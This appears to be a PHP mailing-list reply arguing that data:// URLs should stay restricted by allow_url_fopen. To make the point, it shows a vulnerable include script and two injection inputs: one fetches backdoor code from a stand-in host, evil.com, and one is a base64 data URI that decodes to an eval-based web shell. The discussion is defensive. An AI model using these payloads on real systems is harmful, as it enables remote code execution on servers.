Re: data stream restricted by allow_url_fopen (Bug #47336)
On 11/03/13 12:36, Christian Stoller wrote:
> Hi Stas.
>> I'm afraid it is not a good idea. allow_url_fopen is meant to protect
>> file functions (fopen and friends) from being injected with
>> user-controlled data - i.e. if you control the filesystem and you do
>> fopen() under allow_url_fopen then it is reasonable to assume the data
>> under that filename is under your control. However, data:// URLs clearly
>> violate this assumption no less than http:// URLs do - data: just
>> does
>> it without even requiring a web server.
> I am unsure whether I understand you. As far as I know with the data:// stream PHP does not
> access any file on the filesystem. It's just for transforming normal content in a variable to a
> resource, or not? So I do not see any risk. Maybe you can give me an example.
Suppose you had the silly script:
<?php
$file = $_GET['file'];
include $file . ".php";
As there's no check at all to $file, an attacker could pass in the url
&file=http://evil.com/backdoor-code and php would
happily run the php
code located at http://evil.com/backdoor-code.php
If include of data urls is enabled, the attacker could do the same with
&file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K
Thread (5 messages)